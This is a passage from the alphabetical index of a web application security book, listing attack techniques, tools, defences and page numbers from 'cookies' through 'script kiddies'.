examining, 185–186, 235 expiration dates, 186–187 Flash Cookies, 349 hacking, 152–153 horizontal privilege escalation, 198–200 HTML injection and, 235–236 HTTP, 181, 183, 349 identifying, 214 input validation attacks, 224 load balancer, 40 managing, 183, 198, 214 manual prediction, 185–187 persistent, 141 secure, 145 session, 141, 151–153 session handling, 65 setting values, 183, 198, 214 stealing, 152, 185, 233 user-modifiable roles and, 202–203 CORE IMPACT tool, 89 COTS session IDs, 170–172 COTS (common off-the-shelf) software, 88 COTS (common off-the-shelf) web servers, 170 coupon codes, 342–343 credential management attacks, 159–161 credentials, 156, 250 CRLs (certificate revocation lists), 144 cross-domain access attacks, 344 cross-domain exploitation, 343–344 cross-site request forgery (XSRF) attacks, 153–157, 355 cross-site scripting (XSS), 233–234, 344 crypt() function, 194 crypto-related logic, 340 CSRF (cross-site request forgery) attacks, 153–157, 355 CSS (Cascading Style Sheets), 55 CSS files, 55 cultural buy-in, 401 cURL tool, 25, 180, 207–210 434 Hacking Exposed Web Applications custom parameter injection, 255–256 Custom World List Generator (CeWL), 297 CVS (Concurrent Versions System), 315–316 CVSS (Common Vulnerability Scoring System), 380 Cygwin, 23 ▼D daemons, 88 data access to, 224 client-side storage, 349–352 POST, 179–181 storage, 223, 349–352 untrusted, 345 URI, 104 validation. See validation Data Encryption Algorithm (DES), 174 Data Execution Prevention (DEP), 338, 407 data flow diagrams (DFDs), 373, 375–376 data tier, 5 data types, 250, 261 database server checklist, 415–416 databases attacks on, 11 errors, 239–240, 241 queries, 65 SQL master, 427 SQLite, 350–351 vulnerabilities, 11 datastores, 143, 250, 254 debug parameters, 387 debuggers, 301, 390–396 debugging, 84, 103, 387, 390–397 decryption, 194, 291, 297 delegated authentication, 148–149 delegation, 215 denial-of-service (DoS) attacks automatic password guessing, 128–130 log injection, 256–257 password guessing, 381 SSPR requests, 126 TRACK requests, 106–107 deny characters, 250 DenyHosts tool, 257 DEP (Data Execution Prevention), 338, 407 depth-first algorithms, 128 DES (Data Encryption Algorithm), 174 deserialization, 345 design liabilities, 336, 338, 344 developer comments, 84 development lifecycle, 412 development team, 401–402 DFDs (data flow diagrams), 373, 375–376 dictionary attacks, 129, 191–192 differential analysis, 169, 174–175, 204–206 Digest authentication, 136–137 digital certificates, 144 DirBuster utility, 52, 53, 314, 318 directories access to, 313–314 changes to source code, 315–316 DISCO, 277–279 hidden, 177–178 names, 320 placement, 83–84 protecting, 83–84 structure, 50–52, 83–84 UDDI, 275–279 directory guessing, 313, 315–316 directory listing, 230–232 directory traversal, 110, 177, 228–230 disable_functions option, 118 DISCO (Discovery of Web Services), 277–279 DISCO disclosure, 280–281 Discovery of Web Services. See DISCO display_errors option, 118 DLL files, 110–111, 113, 342, 389–399 DNS entries, 151 document root restriction, 116 DOM Storage, 350 DoS attacks. See denial-of-service attacks Double Decode/Unicode attack, 177, 216 Index 435 DREAD system, 380 Drupal, 98 dumpbin.exe utility, 394 Duwamish Books, 328–330 dynamic scripts, 6 dynamic web application security scanners, 421–422 dynamic web pages, 48–50, 59 dynamic whitelisting, 361 ▼E eavesdropping attacks Basic authentication, 134–135 considerations, 153, 194 countermeasures, 137 Digest authentication, 136–137 overview, 133–137 Telnet and, 296 transport attacks, 11 education, 402, 406 e-mail, plaintext in, 358 e-mail services, 157 embedded scripts, 234–235 employees. See also users accountability, 401–403, 405 cultural buy-in, 401 education, 406 hiring tips, 402–403 organization structure/roles, 403 security and, 401–403 security liaison, 401–402 training, 402, 406 use of trickery on, 336, 352–358, 367–368 encoder/decoder tools, 173 encoding analyzing, 172–174 defeating, 173–174 URLs, 259 encrypted values, 65 encryption analyzing, 172–174 failure of, 206–207 SSL, 137 tools for, 194 Endler, David, 152 end-user license agreement (EULA), 389 Enhanced Security Configuration (ESC), 359–360 enterprise web applications, 371–412 architecture overview, 375–376 code review, 382–396 references, 410–412 security program, 371–412 threat modeling, 372–381 web development process, 401–409 entity encoding, 262 enumeration error codes and, 231–232 functions, 393, 394 overview, 249–250 SQL Server, 426 SSL anomalies, 40 user, 320 username, 125–127 epoch time, 172 error codes, 231–232 error handling, 262 error messages application layer, 240 ASP.NET, 324–325 converting to character arrays, 394 database, 239–240, 241 IIS, 101–103, 110 during login, 125 parsing, 240, 241 password reset functions, 126 timing attacks, 127 verbose, 110, 239, 242, 260, 379 web application registration, 126 error pages information leakage, 322–326 ErrorDocument directive, 324 ESC (Enhanced Security Configuration), 359–360 escape characters, 250 ETag value, 39 Ethereal program. See Wireshark program 436 Hacking Exposed Web Applications Ettercap program, 194 EULA (end-user license agreement), 389 Everyone group, 112 execute ACLs, 112 execution tests, 234 exploitation, 89–91, 92 exploits, 336–352 expose_php option, 118 Extensible Access Control Markup Language (XACML), 289 eXtensible Markup Language. See XML extension mappings, 110–111 extensions ActiveX, 347, 348, 361–363 considerations, 348 file, 52–54 Firefox, 16–18, 29, 347–348, 420 Internet Explorer, 14–16, 420 web applications, 52–54 external entity attacks, 283–285 EZ-Gimpy CAPTCHA, 159 ▼F F5 TrafficShield, 44 Facebook, 71 Factor Analysis of Information Risk (FAIR), 380 FAIR (Factor Analysis of Information Risk), 380 FFsniFF extension, 347–348 Fiddler tool, 21–23, 173 file disclosure, 313–321 file systems, 109 File Transfer Protocol. See FTP filenames, 314–318 files archives, 320 authentication, 320 backups, 320 common, 54 CSS, 55 DLL, 110–111, 113, 342, 389–399 guessing names of, 314–318 helper, 55–56 hidden, 177–178 include, 55, 84, 108 JavaScript, 55, 84 JNLP, 345 log. See log files LSO, 349–350 names, 320 nonexistent, 322–324 old, 320 PDF, 204, 346 vulnerabilities, 313–321, 317, 318 XAP, 340 ZIP, 54, 93, 342 financial transactions, 353–355 fingerprinting authorization, 169–176 HTTP, 34–38 query strings, 62–63 techniques for, 34–38 Firefox browser, 338, 349, 359, 361, 420 Firefox extensions, 16–18, 29, 347–348, 420 firewalls bypassing, 10 importance of, 107, 358 Netcontinuum, 44 proxy detection, 42 references, 85–86 Teros, 43 web app, 43–45 XML, 291 Flash Cookies, 349 Flash objects, 56, 344 Flash vulnerabilities, 340, 343–344, 349 flowcharts, 46–48 folders authentication, 320 CVS, 52 hidden, 177–178 names, 320 vulnerabilities, 313–321 web, 110 footprinting, 32–33 Form Scalpel tool, 26 Index 437 forms in ASP.NET, 137–138 authentication attacks, 130, 132, 137–143 hidden values in, 138–141, 181, 182 HTML, 137–143 LDAP, 142–143 login, 141–143 SQL, 141–142 in web applications, 60–62 web crawlers and, 72–73 XML, 143 FP (FrontPage), 300–302 FPSEs (FrontPage Server Extensions), 300–302 freeware, 53 FrontPage (FP), 300–302, 334 FrontPage Server Extensions (FPSEs), 300–302 FTP (File Transfer Protocol), 299–300 FTP over TLS/SSL (FTPS), 300 FTP servers, 299–300 FTPS (FTP over TLS/SSL), 300 full-knowledge analysis, 372, 375, 382, 389, 409 full-knowledge approach, 372 functionality maps, 176 fuzz-testing, 23, 397–399, 411–412 ▼G GET command, 207 GET method, 139 GET parameter, 260 GET requests, 5, 154, 155, 224, 339 $_GET variable, 260 getit scripts, 49–52, 58 getURL() function, 344 Gimpy-r CAPTCHA, 158, 159 global variables, 260 globalStorage object, 350 Google, 150 Google Ratproxy tool, 23–25 Google search engine client-side storage, 350 profiling with, 66–69 robots.txt file, 71–72 Google Web Toolkit (GWT), 340 grey-box security reviews, 372 Grossman, Jeremiah, 344, 355 groups, 112 GUI web hacking, 2–3 GUIDs, ActiveX, 363 Guninski, Georgi, 347 GWT (Google Web Toolkit), 340 ▼H hacking web applications. See also attacks considerations, 2–3 exploits, 336–352 general countermeasures, 358–364 means of attack, 12–28 motivations for, 9–10 overview, 1–29 references, 27–29, 119–121 tools/techniques cribsheet, 419–428 trickery, 336, 352–358, 367–368 via command-line tools, 25–26 via GUI, 2–3 via HTTP proxies, 18–25 via URI, 3–4 via web browsers, 13–18 weak spots, 11–12 who, when, where?, 11–12 Hanson, Robert, 355 Hardened PHP Project site, 260, 343 hashed message authentication codes (HMACs), 153 hashes MD5, 41, 136, 137, 191–192, 203 SHA1, 343 hashing algorithms, 136 headers HTTP. See HTTP headers location, 83 438 Hacking Exposed Web Applications headers (cont.) overview, 4–5 predefined, 235–236 Referer, 183–184 Set-Cookie, 183, 198, 214 helper files, 55–56 hidden resources, 177–178 hijacked accounts, 203 HIP (Human Interactive Proof) technology, 158 HMACs (hashed message authentication codes), 153 horizontal privilege escalation, 168, 196–201 HP WebInspect tool, 108 HTML (HyperText Markup Language) broken links, 73 comments, 58–59, 181 embedding JavaScript in, 7 load balancers and, 40–41 old, 58 security considerations, 7, 8–9, 338 vulnerabilities, 58–60, 313 web clients and, 7–8 HTML forms, 137–143 HTML injection, 233–236 HTTP (HyperText Transfer Protocol) authentication, 129, 134–135, 288 broken links, 73 considerations, 4–5, 8, 10 hacking web apps via, 2 HTML forms, 137–143 limiting access, 211–212 proxy tools, 29 SOAP Over HTTP, 269–273 HTTP analysis, 12–13, 399 HTTP Basic authentication, 129, 134–135 HTTP clients, 4 HTTP cookies, 181, 183, 349 HTTP Editor, 198–201 HTTP fingerprinting, 34–38 HTTP headers input validation attacks, 224 LiveHTTPHeaders plug-in, 16–17 manual prediction, 181–184 overview, 4–5 server anomalies, 35–36 UrlScan, 111 HTTP methods, 4–5 HTTP proxies, 18–25 HTTP query strings, 179–180 HTTP requests, 111, 322 HTTP response splitting, 224–225 HTTP servers, 34–38, 298 HTTP status codes, 313 httprint tool, 36, 37 HTTPS considerations, 4, 9, 10, 135 HTTP proxies and, 18–19 proxy tools, 29 SOAP Over HTTPS, 269–273 HTTP/S proxy tools, 420 Human Interactive Proof (HIP) technology, 158 Hydra tool, 129 hyperlinks, 73, 74, 80, 183, 357–358 HyperText Markup Language. See HTML ▼I, 152 identifiers, 168 identity management, 157–161 Identity Selector technology, 150 identity theft, 161–162, 355 IE (Internet Explorer) ActiveX controls, 347, 348, 361–363 considerations, 358 extensions, 14–16, 420 protected mode, 359–360 references, 420 safe mode, 359 IE Developer Toolbar, 420 IE Headers extension, 15, 420 IEToys, 19 IEWatch extension, 15, 16, 420 IFRAME tags, 155, 355–356, 357 Index 439 IIS (Internet Information Server) anonymous access accounts, 111 authorization, 212–213 considerations, 88 disabling extensions, 310, 311 error messages, 101–103, 110 extension mappings, 110–111 password guessing, 133 permissions, 111–112 privilege escalation attacks, 113 profiling and, 84 references, 174–175 securing, 110–113 suspicious file names, 109 TRACK requests, 106–107 web server extensions, 309, 311, 312 WebDAV on, 308 IIS 6.0 server name spoof, 101–104 IIS hardening, 110–113 IIS Manager tool, 212–214 IIS web root, 110 IISHack exploit, 309 IISHelp directory, 101–102 impersonation, 215–216 implementation vulnerabilities, 336, 337–352 .inc extension, 108 incident response process, 405 include file disclosure, 326–327 include files, 55, 84, 108 information cards, 150 information leakage misconfigurations, 312–327 infrastructure profiling, 32–45 initial sequence numbers (ISNs), 189–191 injection attacks. See also input injection attacks HTML injection, 233–236 SQL injection, 238–249, 281–283 XPath, 251–253, 285–287 input filters, 262–263 input injection attacks, 221–265 bypassing validation routines, 225 common attacks, 225–260 common side-effects, 260 cookies, 224 countermeasures, 261–262 custom parameter, 255–256 free tools, 264 HTML, 233–236 LDAP, 254–255 log, 256–257 references, 264–265 SQL, 238–251 targets, 224–225 threats, 223–224 XPATH, 251–253, 285–287 input validation, 222, 263, 383–384, 407 input validation attacks. See input injection attacks input validation characters, 425 input validation tools, 424 input values, 261 Integrated Windows authentication, 130–131 Internet Explorer. See IE Internet Information Server. See IIS Internet Server Application Programming Interface. See ISAPI Internet Storm Center (ISC), 346 IP addresses, 38, 39, 214 ISAPI (Internet Server Application Programming Interface), 6, 389–398 ISAPI applications, 113 ISAPI DLLs, 110–111, 113, 389–399 ISAPI filters, 44–45 ISC (Internet Storm Center), 346 ISNs (initial sequence numbers), 189–191 IT double-ticketing system, 405 ▼J JAAS (Authentication and Authorization Service), 387 jad (Java Disassembler), 56, 93 .jar extension, 93 Java applets, 56–57, 345, 346 Java Archives, 93 Java classes, 56–57 440 Hacking Exposed Web Applications Java Disassembler (jad), 56, 93 Java language, 56 Java regular expression class, 384 Java Runtime Engine (JRE), 345 Java sandboxes, 344–345 Java server WebDAV overflows, 90–91 Java servlets, 56–57 Java vulnerabilities, 344–346 Java Web Start (JWS), 345 JavaScript client-side, 225 disabling, 225 embedding in HTML, 7 input validation issues, 222–223, 225 malicious, 338–340 vulnerabilities, 222–223, 345 JavaScript files, 55, 84 JavaScript malware, 346 JavaScript Object Notation. See JSON JavaScript technologies, 8 java.util.Calendar class, 345–346 JNLP files, 345 JRE (Java Runtime Engine), 345 JSON (JavaScript Object Notation), 338–340 JSON hijacking, 338–340 JWS (Java Web Start), 345 ▼K kill-bit, 362–363 Koivu, Sami, 346 Korn Shell (ksh), 257 ▼L Last-Modified value, 39–40 layers, 5 LDAP (Lightweight Directory Access Protocol), 254, 299 LDAP injection, 254–255 LDAP-backed login forms, 142–143 least-privilege access, 262 Legerov, Evgeny, 89 lifecycle, development, 412 Lightweight Directory Access Protocol. See LDAP LinkedIn, 71 links, 73, 74, 80, 183, 357–358 Live ID, 147–149, 160, 164 LiveHTTPHeaders plug-in, 16–17 LiveJournal, 344 load balancer cookies, 40 load balancers, 39–41 Local Shared Objects. See LSO localhost vulnerability, 101–103 local.js file, 83 location headers, 83 lockouts, account, 126–127, 128, 132, 381 log evasion, 104–107 log files FTP logs, 317 security logs, 133, 216–217 SSH logs, 257 type of data logged, 216–217 vulnerabilities, 317, 318 web logs, 104–107 web server logs, 109 log injection, 256–257 logic layer, 5 login forms, 141–143 logins bypassing, 2, 3 error messages during, 125 limits on, 215 Lotus Domino URL, 82 low-privilege browsing, 359–361 LSO (Local Shared Objects), 349–350 LSO files, 349–350 Lupper worm, 98 Lynx web browser, 74–75 ▼M Maltego tool, 70 malware, 340, 367–368 managed execution environments, 406 Index 441 man-in-the-middle (MITM) attacks, 145, 161, 194 mashups, 9 McLain, Fred, 347 MD4 algorithms, 136 MD5 algorithms, 174, 203 MD5 hashes, 41, 136, 137, 191–192, 203 MDcrack tool, 137 Melissa Data service, 70 memory corruption attacks, 338, 345, 407 message digest, 136 Metasploit exploits, 89–91 Metasploit Framework, 89–91, 310 methods, 4–5 metrics, 406 Microsoft, 150 Microsoft “cheat sheet,” 377, 380 Microsoft Update service, 108, 120 mirroring applications, 47–48 misconfiguration vulnerabilities, 309–332 information leakage, 312–327 state management, 327–332 unnecessary extensions, 309–312 mitigation strategies, 380–381 MITM (man-in-the-middle) attacks, 145, 161, 194 Modify Headers extension, 18 ModSecurity module, 115 MS SQL stored procedures, 426–427 MS SQL (Transact-SQL) variables, 426 ▼N name spoofing, 101–104 .NET assemblies, 342 .NET Framework (.NET FX), 384 .NET vulnerabilities, 101, 103 netcat tool, 5, 25 Netcontinuum firewall, 44 Netflix vulnerability, 155 Netscape Navigator, 9 netstat command, 109 netstat utility, 109 network access control, 107–119 networks security checklist, 414 social, 71 newline characters, 256 Nimda worm, 223 nonces, 136, 137, 156, 157, 193, 355 normalization, 261 notations, 262 NT File System. See NTFS NT LAN Manager. See NTLM NTFS (NT File System), 111 NTFS ACLs, 111–112 NTLM authentication, 130–131 NTLM (NT LAN Manager) authentication, 131 NTLM authorization proxy server, 130–131 NTLM Authorization Proxy Server (APS) utility, 131 numeric boundaries, 174, 175 numeric values, 237 ▼O OEP (Offline Explorer Pro), 76–77, 169 offline browsers, 169 Offline Explorer Pro (OEP), 76–77, 169 OllyDbg debugger, 390–396 one-time passwords (OTP), 146–147 online polls, 158 open() function, 258 open source intelligence, 70–71 Open Web Application Security Project. See OWASP open_basedir option, 118 OpenID system, 147, 149–150, 165 OpenSSL, 297 OpenSSL s_client, 50 OR operator, 252 Oracle Application Server, 77–79 Oracle WebLogic Node Manager service, 92–97 organization structure/roles, 403 OTP (one-time passwords), 146–147 442 Hacking Exposed Web Applications output encoding libraries, 408 output validation, 261 overt vulnerabilities, 336 OWASP (Open Web Application Security Project), 12 OWASP DirBuster utility, 52, 53, 314, 318 OWASP WebScarab tool, 19–21 ▼P parameterization, 253 parameterized queries, 251 Paros Proxy tool, 19 parsing errors, 240, 241 PassMark technology, 144–146 Passport authentication, 160–161, 164, 165. See also Windows Live ID password guessing attacks, 127–133, 148, 158 password policies, 129 passwords Apache Tomcat, 97–98 cleartext, 108 considerations, 144 one-time, 146–147 resetting, 126 Telnet, 296 password/username threats, 124–143 patches. See security patches path disclosure, 313–321 path names, 84 PDF files, 204, 346 PEAR/PHP XML-RPC, 98–101 penetration testing (pen-testing), 400–401 people. See employees; users PeopleSoft URL, 79–81 percent sign (%), 237 Perl scripts, 173–174 permissions IIS, 111–112 mapping, 207–210 personally identifiable information (PII), 161, 217, 364 phishing attacks considerations, 146, 223 countermeasures, 356–358 one-time passwords and, 146 OpenID sites, 149, 150 overview, 10, 352–355 references, 367–368 Phoenix bit, 362–363 PHP best practices, 118–119 global variables, 259–260 security options, 118–119 session ID generation, 152 PHP/PEAR XML-RPC, 98–101 PII (personally identifiable information), 161, 217, 364 PIN/password guessing, 129 pipe (|) character, 258 plaintext, 358 platforms. See web platforms plug-in path, 392 Plupii worm, 98 point-and-click exploitation, 89–91 polls, online, 158 port scanning defining scope, 32–33 IP ranges, 39 ports proprietary, 298–299 TCP. See TCP ports UDP, 299 for web management, 298–299, 428 POST data, 179–181 POST method, 139 POST parameter, 260 POST requests, 5, 50, 91, 155, 224, 258 $_POST variable, 260 post-mortem analysis, 405 PostNuke, 98 predefined headers, 235–236 prediction automated, 187–194 manual, 179–187 prepared statements, 251 Index 443 presentation layer, 5 privilege escalation attacks horizontal, 168, 196–201 IIS, 113 vertical, 168, 201–204 privileges least-privilege access, 262, 358 low-privilege browsing, 359–361 process documentation, 405–406 Product Security Incident Response team (PSIRT), 346 profiling, 31–86 application, 45–82 common profiles, 77–82 countermeasures, 82–84 infrastructure, 32–45 overview, 32 references, 85–86 search tools for, 66–72 profiling tools, 423 proxies HTTP, 18–25 open, 420 reverse, 41 web browsers, 420 ProxMon utility, 20 proxy detection, 41–43 proxy requests, 42–43 proxy servers, 41, 130–131 PSIRT (Product Security Incident Response team), 346 public key cryptography, 144 PWNtcha decoder, 159, 160 Pynnonen, Jouko, 344–345 ▼Q QA (quality assurance), 399, 404 queries database, 65 parameterized, 251 subqueries, 243–245 XPath, 143, 286–288, 325–327 query strings, 4, 62–65, 179–180 QuickTime plug-in exploits, 347 Quip application, 178 ▼R Ratproxy tool, 23–25 RBAC (role-based access control), 386 readObject() method, 345, 346 Really Simple Syndication (RSS), 8, 9 Red Gate Reflector tool, 342, 343 Referer header, 183–184 referers, 5 Reflector tool, 342, 343 Reflexil plug-in, 342 regular expressions, 261 relying party, 149 Remote IIS 5.x name spoof, 101–104 remote servers, 89, 101–104, 296–299 replay attacks, 133–137 repudiation attacks, 256–257 resource providers, 148 resources access to, 6 hidden, 177–178 nonexistent, 322–324 resultPage parameter, 63 return on investment (ROI), 372 reverse proxies, 41 Reverse Turing Test (RTT), 158 RevertToSelf calls, 113 RFC 4918, 8 RIA (Rich Internet Applications), 340–344 Rich Internet Applications (RIA), 340–344 risk quantification, 411 Robocopy tool, 110 robots.txt file, 71–72 ROI (return on investment), 372 role matrix, 175–176 role-based access control (RBAC), 386 roles organizational, 403 understanding, 405 user-modifiable, 202–203 root restriction, Apache, 116 444 Hacking Exposed Web Applications RSS (Really Simple Syndication), 8, 9 RTT (Reverse Turing Test), 158 ▼S Safari browser, 420 safe_mode option, 118–119 same-origin policy, 9, 343 SAML (Security Assertion Markup Language), 289 sandboxed applications, 360–361 sandboxes, 338, 344–345 Sandboxie, 360–361 sanitization routines, 383–384 SANS Institute, 346 scanners. See web application security scanners scanning. See port scanning scp (Secure Copy) utility, 297, 300 script kiddies, 109